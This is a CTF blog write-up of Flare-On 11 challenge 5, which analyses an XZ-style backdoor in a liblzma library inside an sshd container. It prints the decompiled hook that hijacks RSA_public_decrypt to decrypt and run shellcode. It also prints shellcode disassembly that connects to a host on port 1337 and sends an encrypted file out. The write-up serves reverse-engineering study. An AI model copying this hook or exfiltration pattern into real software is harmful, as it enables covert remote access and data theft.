Flare on 11#

Flare-On 11 is the 11th revision of the annual Flare-On challenge. Flare-on is famous for its difficult Windows oriented reverse engineering challenges. The CTF is one of my favourites.

This year was fun, and introduced challenges including a variety of platforms including Verilog and Smart Contracts.

I solved a total of 8 challenges out of 10. I got pretty far and I’m proud! :)

Challenges 5, 7 and 9 were interesting. Rest of them were pretty simple and I had a really manual way of going about them. In this blogpost, we’ll take a look at challenge 5 specifically.

Challenge 5: sshd#

The challenge begins by giving us a pretty huge tar file, ssh_container.tar. The name of the tar suggests it is some kind of file system. We can take a look at what’s inside with tar xvf ssh_container.tar, and it indeed is a full blown file system.

Taking a look at /root/flag.txt, it turns out to be a false flag :p If only…

Coredump#

I had to sift through the entire filesystem, but I couldn’t find anything interesting. After looking for a while, I found a coredump in one of the directories.

Running file on this tells us that this is a coredump generated for the /sbin/sshd, a SSH daemon that’s also present on the filesystem.

We can go ahead and load this coredump along with the binary in gdb. Doing so tells us that the binary encountered a SIGSEGV. We can try printing a backtrace in gdb to find out exactly where the crash happened.

Interesting! liblzma.so.5.4.1 immediately brings back some memories! :p

liblzma.so.5.4.1#

This is a shared library that’s also present on the filesystem. We can grab a copy and load it in Ghidra. Looking around in Ghidra, I eventually stumbled across _INIT_1.

void _INIT_1(void)

{
  int iVar1;
  long in_FS_OFFSET;
  void *local_18;
  long local_10;
  
  local_10 = *(in_FS_OFFSET + 0x28);
  local_18 = 0x0;
  iVar1 = FUN_00108b10(&local_18,_strlen,_strlen + 0x10);
  if (iVar1 == 0x0) {
    FUN_001091b0(local_18,"RSA_public_decrypt", FUN_00109820,0x0);

    if (local_18 != 0x0) {
      free(local_18);
    }
  }
  if (local_10 == *(in_FS_OFFSET + 0x28)) {
    return;
  }
  // WARNING: Subroutine does not return
  __stack_chk_fail();
}

RSA_public_decrypt string looks interesting to us, especially in the context of the XZ backdoor article I linked to.

We can look inside FUN_00109820 and google for the strings inside. Doing so leads us to kubo/plthook. TL;DR - FUN_00109820 installs a hook into RSA_public_decrypt, and replaces the function with FUN_00109820. What this does is that it replaces the address to the actual function in the PLT of the binary with our hook’s address. Thus, we can analyze the hook at FUN_00109820.

Since we know that FUN_00109820 hooks RSA_public_decrypt, its function signature is exactly the same as RSA_public_decrypt. Knowing this, we can edit the function signature and relabel the variables to make the decompilation a bit more digestible.

int hook_RSA_public_decrypt(int flen,char *from,char *to,RSA *rsa,int padding) {
  __uid_t _Var1;
  int iVar2;

  code *pcVar3;
  void *__dest;
  char *pcVar4;
  long in_FS_OFFSET;
  undefined local_108 [0xc8];
  long local_40;
  

  local_40 = *(in_FS_OFFSET + 0x28);
  _Var1 = getuid();

  pcVar4 = "RSA_public_decrypt";
  if (_Var1 == 0x0) {

    if (*from == -0x3abf85b8) {
      FUN_001093f0(local_108,from + 0x4,from + 0x24,0x0);
      __dest = mmap(0x0,DAT_00132360,0x7,0x22,-0x1,0x0);
      pcVar3 = memcpy(__dest,&DAT_00123960,DAT_00132360);

      FUN_00109520(local_108,pcVar3,DAT_00132360);
      (*pcVar3)();
      FUN_001093f0(local_108,from + 0x4,from + 0x24,0x0);
      FUN_00109520(local_108,pcVar3,DAT_00132360);
    }
    pcVar4 = "RSA_public_decrypt ";
  }
  pcVar3 = dlsym(0x0,pcVar4);
  iVar2 = (*pcVar3)(flen,from,to,rsa,padding);
  if (local_40 == *(in_FS_OFFSET + 0x28)) {
    return iVar2;
  }
  // WARNING: Subroutine does not return
  __stack_chk_fail();
}

Looking at this decompilation, we can get a pretty good sense of what’s going on. The hook only works if getuid returns zero, i.e. if the root user is executing this. This would make sense as the hook gets triggered by sshd, which is most likely to be run by the root user. The hook also checks if the from parameter is a very specific value -0x3abf85b8(equivalent to 0xc5407a48). If so, It calls FUN_001093f0 and passes it local_108 along with what seems like offsets into the struct pointed to by from.

We then map DAT_00132360 = 0xf96 size of memory, and memcpy those many bytes into the mapped memory region.

The code following it is interesting. FUN_00109520 receives local_108, our memory region pcVar3 and the size 0xf96. Then the memory region is called. This is probably shellcode then! The two following invocations of FUN_001093f0 and FUN_00109520 are exactly the same as the previous invocations. This is smelling of some kind of a decrypt-execute-encrypt code, where a shellcode in memory is decrypted, executed and then encrypted again to prevent reverse engineering.

But what is the cipher being used? Looking inside FUN_001093f0, we see the following instruction in the disassembly:

   0010942b MOV      RDI,0x3320646e61707865
   0010945d MOV      RDI,0x6b20657479622d32

Converting these constants from hex to an ASCII string results in 3 dnapxe and k etyb-2. If we consider that this is little endian, we can concatenate this and we get expand 32-byte k. This is Salsa20 or ChaCha20! This would mean that the offsets from + 0x4 and from + 0x24 and probably key and nonce!

The code then calls the actual RSA_public_decrypt (notice the subtle trailing space) by locating it with dlsym and executing it.

Summary so far#

We essentially have two pieces of the puzzle: Our RSA_public_decrypt hook and the coredump. From the coredump, we can infer that we crashed sometime when checking the stack cookie:

From this location in the coredump, we can get enough information about the key and nonce to decrypt the shellcode.

But we’re still missing a part of the puzzle. Is this Salsa20 or ChaCha20? We can get to know this by looking at the suspected state initialization function. You’ll remember from the earlier disassembly where we found the expand 32-byte k constant that the instruction look like this in the decompilation:

// "3 dnapxe"
uVar1[0x10] = 0x3320646e61707865;
// "k etyb-2"
uVar1[0x11] = 0x6b20657479622d32;

Converting these constants from hex to an ASCII string results in 3 dnapxe and k etyb-2. If we consider that this is little endian, we can concatenate this

Since the two halves are adjacent in the cipher state, this must be ChaCha20! This is because the states of ChaCha20 and Salsa20 are initialized in different ways. Salsa:

ChaCha

Key and nonce recovery#

Now that we know that the algorithm is definitely ChaCha20, we know that the key is 32 byte and the nonce is 12 bytes.

Looking at the disassembly of the function calls in the hook, particulary where from + 0x4 and from + 0x24 are passed on,

   001098c0 LEA      R11,[RBP + 0x24]
   001098c4 LEA      R10,[RBP + 0x4]

we see that RBP is being used to index into the struct. We can use this same fact and locate our key and nonce in the coredump. Remember that the ChaCha/Salsa key is 32 bytes and the nonce is 12 bytes. Hence,

This gives us the key = 943df638a81813e2de6318a507f9a0ba2dbb8a7ba63666d08d11a65ec914d66f and the nonce = f236839f4dcd711a52862955. Combined with the 0xf96 bytes of encrypted shellcode, this decrypts beautifully into x86 shellcode.

Shellcode analysis#

We can load this shellcode into Ghidra.

The shellcode calls a function FUN_00000dc2. This function involves some syscalls, and Ghidra doesn’t resolve them properly in the decompiler, so it is much better to look at the listing instead.

   00000dcb  LEA      RSP=>local_16b0,[RSP + -0x1688]
   00000dd3  MOV      EAX,0xa00020f
   00000dd8  MOV      DX,0x539
   00000ddc  CALL     FUN_0000001a

After the function prologue, this pushes some interesting values on the stack. 0x539 is 1337! The function FUN_0000001a wraps two syscalls that connect to a socket. Based on the values passed to the function, I could infer that the connection is being made to host 10.0.2.15 (0xa00020f) and port 1337. This must be the attacker’s machine.

Further in the original function, we encounter 4 recvfrom syscalls that load data into various offsets on the stack. See an example:

   00000de3 LEA      RSI=>local_12a0,[RBP + -0x1278] ; buf points to RBP - 0x1278
   00000dea PUSH     0x2d ; recvfrom
   00000dec POP      RAX
   00000ded MOV      EDI,EBX
   00000def PUSH     0x20 ; load 32 bytes
   00000df1 POP      RDX
   00000df2 XOR      R10D,R10D
   00000df5 XOR      R8D,R8D
   00000df8 XOR      R9D,R9D
   00000dfb SYSCALL

Based on the four syscalls, we can infer the size of data loaded at different offsets:

Address/Offset Size in bytes
RBP - 0x1278 32
RBP - 0x1258 12
RBP - 0x1248 dword ptr RBP - 0xf0
RBP - 0xc8 4

Looking further in the code,

   00000e99 LEA      RAX=>local_e8,[RBP + -0xc0]
   00000ea0 LEA      RDX=>local_12a0,[RBP + -0x1278]
   00000ea7 LEA      RCX=>local_1280,[RBP + -0x1258]
   00000eae XOR      R8D,R8D
   00000eb1 CALL     FUN_00000cd2
   00000eb6 LEA      RAX=>local_e8,[RBP + -0xc0]
   00000ebd LEA      RDX=>local_1170,[RBP + -0x1148]
   00000ec4 MOV      ECX,dword ptr [RBP + local_ec]
   00000eca CALL     FUN_00000d49

We can see that two function calls are being made, and the arguments to the function calls are the data that we receive from the network.

Taking a look at the first function

void FUN_00000cd2(void)

{
  int iVar1;
  undefined *in_RAX;
  long i;
  undefined *puVar2;
  int *piVar3;
  undefined8 in_R8;
  
  puVar2 = in_RAX;
  for (i = 0xc0; i != 0x0; i += -0x1) {
    *puVar2 = 0x0;
    puVar2 = puVar2 + 0x1;
  }
  FUN_00000a93();
  *(in_RAX + 0xb0) = in_R8;
  piVar3 = in_RAX + 0xb4;
  iVar1 = FUN_00000f20();

  *piVar3 = iVar1 + (in_R8 >> 0x20);
  *(in_RAX + 0x78) = in_R8;
  *(in_RAX + 0x40) = 0x40;
  return;
}

The decompilation looks a bit off. Specifically, the in_RAX business Ghidra seems to do. We can take care of this however, by modifying the function signature. What the in_RAX means is that the register being operated on, as it was passed in the function. We can take care of this by choosing custom storage for function parameters in Ghidra.

After specifying all of the function parameters, the decompilation looks a lot cleaner:

void FUN_00000cd2(undefined *param_1,undefined *param_2,undefined *param_3,undefined8 param_4)

{
  int iVar1;
  long i;
  undefined *puVar2;
  int *piVar3;
  
  puVar2 = param_1;
  for (i = 0xc0; i != 0x0; i += -0x1) {
    *puVar2 = 0x0;
    puVar2 = puVar2 + 0x1;
  }
  FUN_00000a93(puVar2,param_4,param_3,param_2,param_1);
  *(param_1 + 0xb0) = param_4;
  piVar3 = param_1 + 0xb4;
  iVar1 = FUN_00000f20(param_1 + 0x68);
  *piVar3 = iVar1 + (param_4 >> 0x20);
  *(param_1 + 0x78) = param_4;
  *(param_1 + 0x40) = 0x40;
  return;

}

Seeing the *(param_1 + 0x40) = 0x40; rang a lot of bells for me. This is the ChaCha20 state initialization function (again!). This means that the other function must be ChaCha20 encrypt function.

We can clean up the decompilation again and the result is pretty satisfying.

One other incredible gotcha in here that the ChaCha20 is standard except for the nothing-up-my-sleeve constant being used. Standard ChaCha20 uses expand 32-byte k while the binary uses expand-32-byte K (notice the uppercase K). This was really sneaky!

Extracting all the data#

Since we know that we receive 32 bytes and then 12 bytes over the TCP socket, this must be the key and the nonce for ChaCha20. The encrypted data must be the data at RBP - 0xec.

One interesting thing to note is that the RBP inside our shellcode is actually the RSP in the GDB backtrace. This is because of the function prologue that happens when the shellcode gets called:

00000000 PUSH     RBP
00000001 MOV      RBP,RSP

The original function also opens and reads some content inside a file. This filename should be present at RSP - 0x1248 in the coredump. If we look in the GDB coredump, we can see that the filename doesn’t exist at RSP - 0x1248 but at RSP-0x1288.

We know that the data inside this file is encrypted and sent over the network.

   00000ee9 LEA      RSI=>len,[RBP + -0x1148]
   00000ef0 PUSH     0x2c
   00000ef2 POP      RAX
   00000ef3 MOV      EDI,EBX
   00000ef5 MOV      EDX,dword ptr [RBP + buff]
   00000efb XOR      R10D,R10D
   00000efe XOR      R8D,R8D
   00000f01 XOR      R9D,R9D
   00000f04 SYSCALL

We can take a look at RBP - 0x1148 for the encrypted data then.

This is a pretty good indicator that the data is all offset by -0x40. Thus we now know the locations of the key and nonce and the encrypted data as well. Let’s get all of the data. The length of the encrypted buffer must also be somewhere on the stack. Let’s just get the first 64 bytes for now.

Key, nonce and encrypted data.

Since we know that the ChaCha20 implementation is a bit non-standard, we can write our own implementation (or just let a LLM generate one for us :p)

Plugging all of the values into this implementation and running the script gives us our flag.

import struct
from typing import List

class ChaCha20Context:
    def __init__(self):
        self.state: List[int] = [0] * 16
        self.keystream32: List[int] = [0] * 16
        self.key: bytes = bytes(32)
        self.nonce: bytes = bytes(12)
        self.counter: int = 0
        self.position: int = 0

def rotl32(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def pack4(a: bytes) -> int:
    return struct.unpack('<I', a)[0]

def unpack4(src: int) -> bytes:
    return struct.pack('<I', src)

def chacha20_init_block(ctx: ChaCha20Context, key: bytes, nonce: bytes):
    ctx.key = key
    ctx.nonce = nonce
    magic_constant = b"expand 32-byte K"

    ctx.state[0] = pack4(magic_constant[0:4])
    ctx.state[1] = pack4(magic_constant[4:8])

    ctx.state[2] = pack4(magic_constant[8:12])
    ctx.state[3] = pack4(magic_constant[12:16])
    for i in range(8):
        ctx.state[4 + i] = pack4(key[i*4:i*4+4])
    ctx.state[12] = 0
    ctx.state[13] = pack4(nonce[0:4])
    ctx.state[14] = pack4(nonce[4:8])
    ctx.state[15] = pack4(nonce[8:12])

def chacha20_block_set_counter(ctx: ChaCha20Context, counter: int):
    ctx.state[12] = counter & 0xFFFFFFFF
    ctx.state[13] = pack4(ctx.nonce[0:4]) + (counter >> 32)

def chacha20_block_next(ctx: ChaCha20Context):
    ctx.keystream32 = ctx.state.copy()

    def quarter_round(x, a, b, c, d):

        x[a] = (x[a] + x[b]) & 0xFFFFFFFF
        x[d] = rotl32(x[d] ^ x[a], 16)
        x[c] = (x[c] + x[d]) & 0xFFFFFFFF
        x[b] = rotl32(x[b] ^ x[c], 12)
        x[a] = (x[a] + x[b]) & 0xFFFFFFFF

        x[d] = rotl32(x[d] ^ x[a], 8)
        x[c] = (x[c] + x[d]) & 0xFFFFFFFF
        x[b] = rotl32(x[b] ^ x[c], 7)

    for _ in range(10):
        quarter_round(ctx.keystream32, 0, 4, 8, 12)

        quarter_round(ctx.keystream32, 1, 5, 9, 13)
        quarter_round(ctx.keystream32, 2, 6, 10, 14)
        quarter_round(ctx.keystream32, 3, 7, 11, 15)
        quarter_round(ctx.keystream32, 0, 5, 10, 15)
        quarter_round(ctx.keystream32, 1, 6, 11, 12)
        quarter_round(ctx.keystream32, 2, 7, 8, 13)
        quarter_round(ctx.keystream32, 3, 4, 9, 14)

    for i in range(16):
        ctx.keystream32[i] = (ctx.keystream32[i] + ctx.state[i]) & 0xFFFFFFFF

    ctx.state[12] = (ctx.state[12] + 1) & 0xFFFFFFFF
    if ctx.state[12] == 0:
        ctx.state[13] = (ctx.state[13] + 1) & 0xFFFFFFFF
        assert ctx.state[13] != 0, "Counter overflow"

def chacha20_init_context(ctx: ChaCha20Context, key: bytes, nonce: bytes, counter: int):

    chacha20_init_block(ctx, key, nonce)
    chacha20_block_set_counter(ctx, counter)
    ctx.counter = counter
    ctx.position = 64

def chacha20_xor(ctx: ChaCha20Context, data: bytearray):
    for i in range(len(data)):
        if ctx.position >= 64:
            chacha20_block_next(ctx)
            ctx.position = 0
        data[i] ^= (ctx.keystream32[ctx.position // 4] >> (8 * (ctx.position % 4))) & 0xFF
        ctx.position += 1

# Example usage

if __name__ == "__main__":
    nonce = bytes.fromhex("111111111111111111111111")
    key= bytes.fromhex("8dec9112eb760eda7c7d87a443271c35d9e0cb878993b4d904aef934fa2166d7")
    
    plaintext = bytes.fromhex("a9f63408422a9e1c0c03a8089470bb8daadc6d7b24ff7f247cda839e92f7071d")
    
    ctx = ChaCha20Context()
    chacha20_init_context(ctx, key, nonce, 0)
    
    data = bytearray(plaintext)
    chacha20_xor(ctx, data)
    print("Dec:", data)

An alternate approach#

An alternate approach to this challenge in the stage 2 shellcode is to just patch the shellcode to connect to localhost, and then let the binary decrypt the data for you. This saves us some trouble of writing and figuring out of the ChaCha20 works.

It goes roughly like this:

  1. Patch the constant IP in the shellcode.
  2. Encrypt this data using the stage 1 ChaCha20 key and nonce.
  3. Patch liblzma with this shellcode
  4. Write a socket client that sends the key, nonce and the encrypted data we located.
  5. The data received should contain the flag.

This was a pretty fun challenge that is closely related to the XZ backdoor incident. I found this page really useful while analyzing the hook. It talks in details about how the hook is triggered and how the backdoor works and it’s really interesting! :)

Appendix#

A fun exercise I did post the challenge it to clean up the decompilation as much as possible. The result is pretty beautiful!

I found a C implementation of ChaCha20 online and downloaded its header file. We can parse this header file and import the data types in Ghidra to get a nice decompilation, especially of the key init function.

void chacha20::init(chacha20_context *ctx,uint32_t *key,uint32_t *nonce,uint64_t counter)
{

  uint32_t uVar1;
  int iVar2;
  undefined8 uVar3;
  ulong i;
  undefined8 *puVar4;
  
  *ctx->keystream32 = 0x0;

  *(ctx->state + 0xe) = 0x0;
  puVar4 = ctx->keystream32 + 0x2 & 0xfffffffffffffff8;
  i = (ctx - puVar4) + 0xc0U >> 0x3;

  for (; i != 0x0; i -= 0x1) {
    *puVar4 = 0x0;
    puVar4 = puVar4 + 0x1;
  }
  uVar3 = *(key + 0x2);
  *ctx->key = *key;
  *(ctx->key + 0x8) = uVar3;

  uVar3 = *(key + 0x6);
  *(ctx->key + 0x10) = *(key + 0x4);
  *(ctx->key + 0x18) = uVar3;
  *ctx->nonce = *nonce;
  uVar1 = nonce[0x2];
  *ctx->state = 0x3320646e61707865;
  *(ctx->nonce + 0x8) = uVar1;
  *(ctx->state + 0x2) = 0x6b20657479622d32;
  ctx->state[0x4] = *key;
  ctx->state[0x5] = key[0x1];
  ctx->state[0x6] = key[0x2];
  ctx->state[0x7] = key[0x3];
  ctx->state[0x8] = key[0x4];
  ctx->state[0x9] = key[0x5];

  ctx->state[0xa] = key[0x6];
  uVar1 = key[0x7];
  ctx->state[0xc] = 0x0;
  ctx->state[0xb] = uVar1;
  ctx->state[0xd] = *nonce;
  ctx->state[0xe] = nonce[0x1];
  ctx->state[0xf] = nonce[0x2];
  *ctx->nonce = *nonce;
  uVar1 = nonce[0x2];
  iVar2 = *ctx->nonce;
  ctx->state[0xc] = counter;
  *(ctx->nonce + 0x8) = uVar1;
  ctx->state[0xd] = (counter >> 0x20) + iVar2;
  ctx->counter = counter;
  ctx->position = 0x40;
  return;
}
$$ \blacksquare \blacksquare \blacksquare $$